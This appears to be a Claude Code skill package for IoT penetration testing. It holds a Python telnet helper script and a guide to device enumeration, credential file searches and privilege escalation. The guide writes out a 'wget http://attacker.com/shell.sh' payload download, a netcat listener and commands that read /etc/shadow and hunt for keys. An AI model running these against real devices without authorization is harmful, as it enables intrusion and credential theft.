IoT Telnet Shell (telnetshell)

This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities.

Prerequisites
- Python 3 with pexpect library (pip install pexpect or sudo pacman -S python-pexpect)
- telnet client installed on the system (sudo pacman -S inetutils on Arch)
- Network access to the target device's telnet port

Recommended Approach: Telnet Helper Script
IMPORTANT: This skill includes a Python helper script (telnet_helper.py) that provides a clean, reliable interface for telnet commu…

, # / # or / $\n r'^User@[^>]+>\\s*$', # User@/root>\n r'^root@[a-zA-Z0-9_-]+[#\\$]\\s*$', # root@device# or root@device$\n r'^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+[:#\\$]\\s*$', # user@host: or #\n r'^\\s*>\\s*$', # Generic >\n r'^[#\\$]\\s*$', # Standalone # or $\n r'BusyBox\\s+v[0-9.]+', # BusyBox prompt\n r'login:\\s*$', # Login prompt\n r'Password:\\s*$'
, # Password prompt\n ]\n\n def __init__(self, host: str, port: int = 23, timeout: float = 3.0,\n prompt_pattern: Optional[str] = None, debug: bool = False,\n logfile: Optional[str] = None):\n \"\"\"\n Initialize telnet helper.\n\n Args:\n host: Target host IP or hostname\n port: Telnet port (default: 23)\n timeout: Read timeout in seconds (default: 3.0)\n prompt_pattern: Custom regex pattern for prompt detection\n debug: Enable debug output\n logfile: Optional file path to log all I/O\n \"\"\"\n self.host = host\n self.port = port\n self.timeout = timeout\n self.debug = debug\n self.conn = None\n self.detected_prompt = None\n self.logfile = None\n self.logfile_handle = None\n\n # Setup prompt patterns\n if prompt_pattern:\n self.prompt_patterns = [prompt_pattern]\n else:\n self.prompt_patterns = self.DEFAULT_PROMPT_PATTERNS\n\n # Track command history\n self.command_history = []\n\n # Setup logfile path\n self.logfile = logfile\n\n # Open logfile if specified\n if logfile:\n try:\n self.logfile_handle = open(logfile, 'a', buffering=1) # Line buffered\n self._log(f\"\\n{'='*60}\\n\")\n self._log(f\"Session started: {datetime.now().isoformat()}\\n\")\n self._log(f\"Target: {host}:{port}\\n\")\n self._log(f\"{'='*60}\\n\")\n except IOError as e:\n print(f\"Warning: Could not open logfile {logfile}: {e}\", file=sys.stderr)\n self.logfile_handle = None\n\n def _debug_print(self, msg: str):\n \"\"\"Print debug message if debug mode is enabled.\"\"\"\n if self.debug:\n print(f\"[DEBUG] {msg}\", file=sys.stderr)\n\n def _log(self, data: str):\n \"\"\"Write data to logfile if enabled.\"\"\"\n if self.logfile_handle:\n self.logfile_handle.write(data)\n self.logfile_handle.flush()\n\n def connect(self) -> bool:\n \"\"\"\n Establish telnet connection.\n\n Returns:\n True if connection successful, False otherwise\n \"\"\"\n try:\n self._debug_print(f\"Connecting to {self.host}:{self.port}...\")\n\n # Spawn telnet connection\n cmd = f\"telnet {self.host} {self.port}\"\n 
self.conn = pexpect.spawn(cmd, timeout=self.timeout, encoding='utf-8')\n\n # Setup logfile if enabled\n if self.logfile_handle:\n self.conn.logfile_read = self.logfile_handle\n\n # Give connection a moment to establish\n time.sleep(0.5)\n\n # Send newline to get initial prompt\n self.conn.sendline(\"\")\n time.sleep(0.5)\n\n # Try to detect prompt\n try:\n # Read any initial output\n self.conn.expect(self.prompt_patterns, timeout=2.0)\n initial_output = self.conn.before + self.conn.after\n self._detect_prompt(initial_output)\n except (pexpect.TIMEOUT, pexpect.EOF):\n # If no prompt detected yet, that's okay\n pass\n\n self._debug_print(f\"Connected successfully. Detected prompt: {self.detected_prompt}\")\n return True\n\n except Exception as e:\n print(f\"Error connecting to {self.host}:{self.port}: {e}\", file=sys.stderr)\n return False\n\n def disconnect(self):\n \"\"\"Close telnet connection.\"\"\"\n if self.conn:\n try:\n self._debug_print(\"Disconnecting...\")\n self.conn.close()\n except:\n pass\n self.conn = None\n\n if self.logfile_handle:\n self._log(f\"\\n{'='*60}\\n\")\n self._log(f\"Session ended: {datetime.now().isoformat()}\\n\")\n self._log(f\"{'='*60}\\n\\n\")\n self.logfile_handle.close()\n self.logfile_handle = None\n\n def _send_raw(self, data: str):\n \"\"\"Send raw data to telnet connection.\"\"\"\n if self.conn:\n self.conn.send(data)\n\n def _detect_prompt(self, text: str):\n \"\"\"\n Detect prompt pattern in text.\n\n Args:\n text: Text to search for prompt\n \"\"\"\n lines = text.split('\\n')\n for line in reversed(lines):\n line = line.strip()\n if line:\n for pattern in self.prompt_patterns:\n if re.search(pattern, line):\n self.detected_prompt = pattern\n self._debug_print(f\"Detected prompt pattern: {self.detected_prompt}\")\n return\n\n def _clean_output(self, raw_output: str, command: str) -> str:\n \"\"\"\n Clean command output by removing echoes, prompts, and ANSI codes.\n\n Args:\n raw_output: Raw output from telnet\n command: 
Command that was sent\n\n Returns:\n Cleaned output\n \"\"\"\n # Remove ANSI escape codes\n ansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])')\n cleaned = ansi_escape.sub('', raw_output)\n\n # Remove carriage returns\n cleaned = cleaned.replace('\\r', '')\n\n # Split into lines\n lines = cleaned.split('\\n')\n\n # Remove empty lines and prompts\n result_lines = []\n for line in lines:\n line = line.rstrip()\n\n # Skip empty lines\n if not line.strip():\n continue\n\n # Skip lines that are just the command echo\n if line.strip() == command.strip():\n continue\n\n # Skip lines that match prompt patterns\n is_prompt = False\n for pattern in self.prompt_patterns:\n if re.search(pattern, line):\n is_prompt = True\n break\n if is_prompt:\n continue\n\n result_lines.append(line)\n\n return '\\n'.join(result_lines)\n\n def send_command(self, command: str, timeout: Optional[float] = None,\n clean: bool = True) -> Tuple[str, bool]:\n \"\"\"\n Send command and wait for output.\n\n Args:\n command: Command to send\n timeout: Optional custom timeout\n clean: Whether to clean the output (remove echoes, prompts)\n\n Returns:\n Tuple of (output, success)\n \"\"\"\n if not self.conn:\n return \"\", False\n\n self._debug_print(f\"Sending command: {command}\")\n\n timeout_val = timeout if timeout is not None else self.timeout\n\n try:\n # Send command\n self.conn.sendline(command)\n\n # Give command time to execute and output to accumulate\n time.sleep(0.2)\n\n # Wait for prompt\n index = self.conn.expect(self.prompt_patterns + [pexpect.TIMEOUT, pexpect.EOF], timeout=timeout_val)\n\n # Check if we got a prompt (not timeout or EOF)\n prompt_found = index \u003c len(self.prompt_patterns)\n\n # Get the output (before is everything before the matched pattern)\n raw_output = self.conn.before\n if prompt_found:\n # After is the matched prompt\n raw_output += self.conn.after\n\n self._debug_print(f\"Raw output length: {len(raw_output)}\")\n\n # Track command\n 
self.command_history.append({\n 'command': command,\n 'timestamp': datetime.now().isoformat(),\n 'success': prompt_found,\n 'raw_output': raw_output[:200] + '...' if len(raw_output) > 200 else raw_output\n })\n\n # Clean output if requested\n if clean:\n output = self._clean_output(raw_output, command)\n else:\n output = raw_output\n\n self._debug_print(f\"Command completed. Success: {prompt_found}, Output length: {len(output)}\")\n return output, prompt_found\n\n except Exception as e:\n self._debug_print(f\"Error sending command: {e}\")\n return \"\", False\n\n def send_commands(self, commands: List[str], delay: float = 0.5) -> List[dict]:\n \"\"\"\n Send multiple commands in sequence.\n\n Args:\n commands: List of commands to send\n delay: Delay between commands in seconds\n\n Returns:\n List of dictionaries with command results\n \"\"\"\n results = []\n for command in commands:\n output, success = self.send_command(command)\n results.append({\n 'command': command,\n 'output': output,\n 'success': success\n })\n if delay > 0:\n time.sleep(delay)\n return results\n\n def interactive_mode(self):\n \"\"\"\n Enter interactive mode where user can type commands.\n Type 'exit' or Ctrl-C to quit.\n \"\"\"\n print(f\"Interactive mode - connected to {self.host}:{self.port}\")\n print(\"Type 'exit' or press Ctrl-C to quit\")\n print(\"-\" * 50)\n\n try:\n while True:\n try:\n command = input(\">>> \")\n if command.strip().lower() in ('exit', 'quit'):\n break\n\n if not command.strip():\n continue\n\n output, success = self.send_command(command)\n print(output)\n\n if not success:\n print(\"[WARNING] Command may have timed out or failed\", file=sys.stderr)\n\n except EOFError:\n break\n\n except KeyboardInterrupt:\n print(\"\\nExiting interactive mode...\")\n\n\ndef main():\n \"\"\"Main entry point for command-line usage.\"\"\"\n parser = argparse.ArgumentParser(\n description='Telnet Helper for IoT Remote Shell Interaction',\n 
formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nExamples:\n # Single command\n %(prog)s --host 192.168.1.100 --command \"uname -a\"\n\n # Custom port\n %(prog)s --host 192.168.1.100 --port 2222 --command \"ps\"\n\n # Interactive mode\n %(prog)s --host 192.168.1.100 --port 2222 --interactive\n\n # Batch commands from file\n %(prog)s --host 192.168.1.100 --script enum_system.txt\n\n # Custom timeout\n %(prog)s --host 192.168.1.100 --timeout 5 --command \"find /\"\n\n # Raw output (no cleaning)\n %(prog)s --host 192.168.1.100 --command \"help\" --raw\n\n # JSON output for scripting\n %(prog)s --host 192.168.1.100 --command \"ifconfig\" --json\n\n # Log all I/O to file (tail -f in another terminal to watch)\n %(prog)s --host 192.168.1.100 --command \"ls\" --logfile session.log\n \"\"\"\n )\n\n # Connection arguments\n parser.add_argument('--host', '-H', required=True,\n help='Target host IP or hostname')\n parser.add_argument('--port', '-P', type=int, default=23,\n help='Telnet port (default: 23)')\n parser.add_argument('--timeout', '-t', type=float, default=3.0,\n help='Read timeout in seconds (default: 3.0)')\n parser.add_argument('--prompt', '-p', type=str,\n help='Custom prompt regex pattern')\n\n # Mode arguments (mutually exclusive)\n mode_group = parser.add_mutually_exclusive_group(required=True)\n mode_group.add_argument('--command', '-c', type=str,\n help='Single command to execute')\n mode_group.add_argument('--interactive', '-i', action='store_true',\n help='Enter interactive mode')\n mode_group.add_argument('--script', '-s', type=str,\n help='File containing commands to execute (one per line)')\n\n # Output arguments\n parser.add_argument('--raw', '-r', action='store_true',\n help='Output raw response (no cleaning)')\n parser.add_argument('--json', '-j', action='store_true',\n help='Output in JSON format')\n parser.add_argument('--logfile', '-l', type=str, default='/tmp/telnet_session.log',\n help='Log all I/O to file (default: 
/tmp/telnet_session.log)')\n parser.add_argument('--debug', action='store_true',\n help='Enable debug output')\n\n args = parser.parse_args()\n\n # Create telnet helper\n helper = TelnetHelper(\n host=args.host,\n port=args.port,\n timeout=args.timeout,\n prompt_pattern=args.prompt,\n debug=args.debug,\n logfile=args.logfile\n )\n\n # Connect to device\n if not helper.connect():\n sys.exit(1)\n\n try:\n if args.interactive:\n # Interactive mode\n helper.interactive_mode()\n\n elif args.command:\n # Single command mode\n output, success = helper.send_command(args.command, clean=not args.raw)\n\n if args.json:\n result = {\n 'command': args.command,\n 'output': output,\n 'success': success\n }\n print(json.dumps(result, indent=2))\n else:\n print(output)\n\n sys.exit(0 if success else 1)\n\n elif args.script:\n # Batch script mode\n try:\n with open(args.script, 'r') as f:\n commands = [line.strip() for line in f if line.strip() and not line.startswith('#')]\n\n results = helper.send_commands(commands)\n\n if args.json:\n print(json.dumps(results, indent=2))\n else:\n for i, result in enumerate(results, 1):\n print(f\"\\n{'='*50}\")\n print(f\"Command {i}: {result['command']}\")\n print(f\"{'='*50}\")\n print(result['output'])\n if not result['success']:\n print(\"[WARNING] Command may have failed\", file=sys.stderr)\n\n # Exit with error if any command failed\n if not all(r['success'] for r in results):\n sys.exit(1)\n\n except FileNotFoundError:\n print(f\"Error: Script file '{args.script}' not found\", file=sys.stderr)\n sys.exit(1)\n except IOError as e:\n print(f\"Error reading script file: {e}\", file=sys.stderr)\n sys.exit(1)\n\n finally:\n helper.disconnect()\n\n\nif __name__ == '__main__':\n main()\n","content_type":"text/x-python; 
charset=utf-8","language":"python","size":15874,"content_sha256":"d4a9819287f2de7175424f7c21d24272e859dc7246b064824c37ecbfc614d74d"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"IoT Telnet Shell (telnetshell)","type":"text"}]},{"type":"paragraph","content":[{"text":"This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python 3 with pexpect library (","type":"text"},{"text":"pip install pexpect","type":"text","marks":[{"type":"code_inline"}]},{"text":" or ","type":"text"},{"text":"sudo pacman -S python-pexpect","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"telnet client installed on the system (","type":"text"},{"text":"sudo pacman -S inetutils","type":"text","marks":[{"type":"code_inline"}]},{"text":" on Arch)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Network access to the target device's telnet port","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Recommended Approach: Telnet Helper Script","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": This skill includes a Python helper script (","type":"text"},{"text":"telnet_helper.py","type":"text","marks":[{"type":"code_inline"}]},{"text":") that provides a clean, reliable interface for telnet communication. 
","type":"text"},{"text":"This is the RECOMMENDED method","type":"text","marks":[{"type":"strong"}]},{"text":" for interacting with IoT devices.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Default Session Logging","type":"text"}]},{"type":"paragraph","content":[{"text":"ALL commands run by Claude will be logged to ","type":"text","marks":[{"type":"strong"}]},{"text":"/tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"},{"type":"strong"}]},{"text":" by default.","type":"text","marks":[{"type":"strong"}]}]},{"type":"paragraph","content":[{"text":"To observe what Claude is doing in real-time:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# In a separate terminal, run:\ntail -f /tmp/telnet_session.log","type":"text"}]},{"type":"paragraph","content":[{"text":"This allows you to watch all telnet I/O as it happens without interfering with the connection.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Why Use the Telnet Helper?","type":"text"}]},{"type":"paragraph","content":[{"text":"The helper script solves many problems with direct telnet usage:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Clean output","type":"text","marks":[{"type":"strong"}]},{"text":": Automatically removes command echoes, prompts, and ANSI codes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Prompt detection","type":"text","marks":[{"type":"strong"}]},{"text":": Automatically detects and waits for device prompts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Timeout handling","type":"text","marks":[{"type":"strong"}]},{"text":": Proper timeout management with no arbitrary sleeps","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Easy 
scripting","type":"text","marks":[{"type":"strong"}]},{"text":": Simple command-line interface for single commands or batch operations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Session logging","type":"text","marks":[{"type":"strong"}]},{"text":": All I/O logged to ","type":"text"},{"text":"/tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":" for observation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Reliable","type":"text","marks":[{"type":"strong"}]},{"text":": No issues with TTY requirements or background processes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"JSON output","type":"text","marks":[{"type":"strong"}]},{"text":": For programmatic parsing and tool chaining","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Quick Start with Telnet Helper","type":"text"}]},{"type":"paragraph","content":[{"text":"Single Command:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command \"uname -a\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Custom Port:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command \"ls /\"","type":"text"}]},{"type":"paragraph","content":[{"text":"With Custom Prompt (recommended for known devices):","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --prompt \"^/ [#\\$]\" --command \"ifconfig\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Interactive 
Mode:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive","type":"text"}]},{"type":"paragraph","content":[{"text":"Batch Commands from File:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Create a file with commands (one per line)\necho -e \"uname -a\\ncat /proc/version\\nifconfig\\nps\" > commands.txt\npython3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --script commands.txt","type":"text"}]},{"type":"paragraph","content":[{"text":"JSON Output (for parsing):","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command \"uname -a\" --json","type":"text"}]},{"type":"paragraph","content":[{"text":"Debug Mode:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command \"ls\" --debug","type":"text"}]},{"type":"paragraph","content":[{"text":"Session Logging (for observation):","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Terminal 1 - Run with logging\npython3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --port 2222 \\\n --logfile /tmp/session.log \\\n --interactive\n\n# Terminal 2 - Watch the session in real-time\ntail -f /tmp/session.log","type":"text"}]},{"type":"paragraph","content":[{"text":"Note:","type":"text","marks":[{"type":"strong"}]},{"text":" See ","type":"text"},{"text":"OBSERVING_SESSIONS.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" for comprehensive guide 
on monitoring telnet sessions.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Telnet Helper Options","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Required (one of):\n --command, -c CMD Execute single command\n --interactive, -i Enter interactive mode\n --script, -s FILE Execute commands from file\n\nConnection Options:\n --host, -H HOST Target host IP or hostname (required)\n --port, -P PORT Telnet port (default: 23)\n --timeout, -t SECONDS Command timeout (default: 3.0)\n --prompt, -p PATTERN Custom prompt regex pattern\n\nOutput Options:\n --raw, -r Don't clean output (show echoes, prompts)\n --json, -j Output in JSON format\n --logfile, -l FILE Log all I/O to file (default: /tmp/telnet_session.log)\n --debug Show debug information","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Common Prompt Patterns","type":"text"}]},{"type":"paragraph","content":[{"text":"The helper script includes common prompt patterns, but you can specify custom ones:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# BusyBox shell (common on IoT)\n--prompt \"/\\s*[#\\$]\\s*$\"\n\n# Standard root/user prompts\n--prompt \"^[#\\$]\\s*$\"\n\n# Custom device\n--prompt \"^MyDevice>\\s*$\"\n\n# Uniview cameras\n--prompt \"^User@[^>]+>\\s*$\"","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Device Enumeration Example with Telnet Helper","type":"text"}]},{"type":"paragraph","content":[{"text":"Here's a complete example of safely enumerating a device:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Set variables for convenience\nHELPER=\"python3 .claude/skills/telnetshell/telnet_helper.py\"\nHOST=\"192.168.1.100\"\nPORT=\"2222\"\nLOGFILE=\"/tmp/telnet_session.log\"\n\n# System information\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"uname 
-a\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"cat /proc/version\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"cat /proc/cpuinfo\"\n\n# Check for BusyBox\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"busybox\"\n\n# Network configuration\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"ifconfig\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"route -n\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"netstat -tulpn\"\n\n# Process listing (may need longer timeout)\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --timeout 5 --command \"ps aux\"\n\n# File system exploration\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"ls -la /\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"mount\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"df -h\"\n\n# Security assessment\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"cat /etc/passwd\"\n$HELPER --host $HOST --port $PORT --logfile \"$LOGFILE\" --command \"find / -perm -4000 2>/dev/null\"","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT FOR CLAUDE CODE","type":"text","marks":[{"type":"strong"}]},{"text":": When using this skill, ALWAYS include ","type":"text"},{"text":"--logfile /tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":" in every command so the user can monitor activity with ","type":"text"},{"text":"tail -f /tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":".","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Instructions","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"1. 
Connection Setup","type":"text"}]},{"type":"paragraph","content":[{"text":"Default connection:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Port","type":"text","marks":[{"type":"strong"}]},{"text":": 23 (standard telnet, override with ","type":"text"},{"text":"--port","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Timeout","type":"text","marks":[{"type":"strong"}]},{"text":": 3 seconds (override with ","type":"text"},{"text":"--timeout","type":"text","marks":[{"type":"code_inline"}]},{"text":")","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Logging","type":"text","marks":[{"type":"strong"}]},{"text":": ","type":"text"},{"text":"/tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]},{"text":" by default","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Common telnet ports on IoT devices:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"23: Standard telnet port","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"2222: Alternative telnet port (common on cameras)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"8023: Alternative telnet port","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Custom ports: Check device documentation or nmap scan results","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2. 
BusyBox Shells (Most IoT Devices)","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": The vast majority of IoT devices use BusyBox, a lightweight suite of Unix utilities designed for embedded systems. BusyBox provides a minimal shell environment with limited command functionality.","type":"text"}]},{"type":"paragraph","content":[{"text":"Identifying BusyBox:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check what shell you're using\nbusybox\nbusybox --help\n\n# Or check symlinks\nls -la /bin/sh\n# Often shows: /bin/sh -> /bin/busybox\n\n# List available BusyBox applets\nbusybox --list","type":"text"}]},{"type":"paragraph","content":[{"text":"BusyBox Limitations:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Many standard Linux commands may be simplified versions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Some common flags/options may not be available","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Features like tab completion may be limited or absent","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Some exploitation techniques that work on full Linux may not work","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Common BusyBox commands available:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Core utilities (usually available)\ncat, ls, cd, pwd, echo, cp, mv, rm, mkdir, chmod, chown\nps, kill, top, free, df, mount, umount\ngrep, find, sed, awk (limited versions)\nifconfig, route, ping, netstat, telnet\nvi (basic text editor - no syntax highlighting)\n\n# Check what's available\nbusybox 
--list | sort\nls /bin /sbin /usr/bin /usr/sbin","type":"text"}]},{"type":"paragraph","content":[{"text":"BusyBox-specific considerations for pentesting:","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"ps","type":"text","marks":[{"type":"code_inline"}]},{"text":" output format may differ from standard Linux","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Some privilege escalation techniques require commands not in BusyBox","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"File permissions still work the same (SUID, sticky bits, etc.)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Networking tools are often present (telnet, wget, nc/netcat, ftpget)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python/Perl/Ruby are usually NOT available (device storage constraints)","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Useful BusyBox commands for enumeration:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check BusyBox version (may have known vulnerabilities)\nbusybox | head -1\n\n# Network utilities often available\nnc -l -p 4444 # Netcat listener\nwget http://attacker.com/shell.sh\nftpget server file\ntelnet 192.168.1.1\n\n# httpd (web server) often included\nbusybox httpd -p 8080 -h /tmp # Quick file sharing","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"3. 
Device Enumeration","type":"text"}]},{"type":"paragraph","content":[{"text":"Once you have shell access, gather the following information:","type":"text"}]},{"type":"paragraph","content":[{"text":"System Information:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Kernel and system info\nuname -a\ncat /proc/version\ncat /proc/cpuinfo\ncat /proc/meminfo\n\n# Distribution/firmware info\ncat /etc/issue\ncat /etc/*release*\ncat /etc/*version*\n\n# Hostname and network\nhostname\ncat /etc/hostname\nifconfig -a\ncat /etc/network/interfaces\ncat /etc/resolv.conf\n\n# Mounted filesystems\nmount\ncat /proc/mounts\ndf -h\n\n# Running processes\nps aux\nps -ef\ntop -b -n 1","type":"text"}]},{"type":"paragraph","content":[{"text":"User and Permission Information:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Current user context\nid\nwhoami\ngroups\n\n# User accounts\ncat /etc/passwd\ncat /etc/shadow # If readable - major security issue!\ncat /etc/group\n\n# Sudo/privilege info\nsudo -l\ncat /etc/sudoers","type":"text"}]},{"type":"paragraph","content":[{"text":"Network Services:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Listening services\nnetstat -tulpn\nlsof -i\n\n# Firewall rules\niptables -L -n -v\ncat /etc/iptables/*","type":"text"}]},{"type":"paragraph","content":[{"text":"Interesting Files and Directories:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Configuration files\nls -la /etc/\nfind /etc/ -type f -readable\n\n# Web server configs\nls -la /etc/nginx/\nls -la /etc/apache2/\nls -la /var/www/\n\n# Credentials and keys\nfind / -name \"*.pem\" 2>/dev/null\nfind / -name \"*.key\" 2>/dev/null\nfind / -name \"*password*\" 2>/dev/null\nfind 
/ -name \"*credential*\" 2>/dev/null\ngrep -r \"password\" /etc/ 2>/dev/null\n\n# SUID/SGID binaries (privilege escalation vectors)\nfind / -perm -4000 -type f 2>/dev/null\nfind / -perm -2000 -type f 2>/dev/null\n\n# World-writable files/directories\nfind / -perm -2 -type f 2>/dev/null\nfind / -perm -2 -type d 2>/dev/null\n\n# Development/debugging tools\nwhich gdb gcc python perl ruby tcpdump\nls /usr/bin/ /bin/ /sbin/ /usr/sbin/","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"4. Privilege Escalation (if not root)","type":"text"}]},{"type":"paragraph","content":[{"text":"Check for common vulnerabilities:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Kernel exploits\nuname -r # Check kernel version for known exploits\n\n# Check for exploitable services\nps aux | grep root\n\n# Writable service files\nfind /etc/init.d/ -writable 2>/dev/null\n\n# Cron jobs\ncrontab -l\nls -la /etc/cron*\ncat /etc/crontab","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"5. Persistence and Further 